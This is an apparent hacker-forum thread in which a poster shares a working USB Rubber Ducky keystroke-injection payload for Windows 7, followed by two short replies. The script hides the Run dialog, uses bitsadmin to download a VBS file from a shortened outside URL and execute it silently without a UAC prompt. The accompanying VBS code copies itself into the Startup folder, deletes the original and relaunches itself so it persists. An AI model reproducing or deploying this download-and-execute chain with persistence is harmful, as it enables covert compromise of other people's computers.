ethicus Posted April 24, 2013 Share Posted April 24, 2013 (edited) I have tested this on windows 7, but nothing else. Still need to test what happens if you run this from a crazy locked down account, but so far it seems to work fine without ever prompting for UAC or complaining about permission issues. REM This payload will download a given file, save it to the user's home directory, and execute it. Works great for VBS files. REM Make sure the file terminates quickly, as the window will stay open until it does. But the window will be blank and minimized. DELAY 10000 GUI r DELAY 200 REM Move the run dialog out of the way ALT SPACE DELAY 20 STRING M DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DELAY 10 ENTER REM Start the download and execution STRING cmd /c start /min cmd /c "cmd /T:01 /Q /c bitsadmin /rawreturn /transfer a http://bit.ly/42z1aRg %userprofile%/pl.vbs & %userprofile%/pl.vbs" ENTER Sample code for the VBS file to ensure it terminates quickly, deletes the original, and also enables auto run on machine startup: ' Find the logged in user's startup folder set WshShell = WScript.CreateObject("WScript.Shell" ) strStartup = WshShell.SpecialFolders("StartMenu") ' See if we are running from the copy in the startup folder if (WScript.scriptName <> "helper.vbs") Then ' We are not, so copy this file into the startup folder dim filesys: set filesys=CreateObject("Scripting.FileSystemObject") filesys.CopyFile WScript.ScriptFullName, strStartup + "\programs\startup\helper.vbs" ' Delete the original filesys.DeleteFile(WScript.ScriptFullName) ' Now execute the copy in the startup folder (asynchroniously, so we dont hang waiting for it to finish) WshShell.Run("""C:\Windows\System32\wscript.exe"" """ + strStartup + "\programs\startup\helper.vbs""") ' We have a copy running from a different process now, so we can quit this one WScript.Quit End If ' Do the rest of your vbs payload here. So when this runs, the ducky script will open a run prompt. Enter 115 chracters. A blank CMD window will open and minimize, then sit there for a second. While its open, in the background its downloading the vbs file from a remote server, copying it to the user's directory, and executing it. The vbs script will copy itself to the user's startup directory, execute the copy, and terminate itself. At that time, the CMD window (still blank and minimized) will close. You now have a VBS script that will run on startup, and can run for as long as you need as a background process. Edited April 24, 2013 by ethicus Quote Link to comment Share on other sites More sharing options...
ethicus Posted April 24, 2013 Author Share Posted April 24, 2013 bitsadmin not natively supported in XP :( So appears to only work in windows 7. Quote Link to comment Share on other sites More sharing options...
overwraith Posted April 24, 2013 Share Posted April 24, 2013 Encoder version 2.4 has the repeat command. You've probably already seen it, but here is the link to the hide command window payloads. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.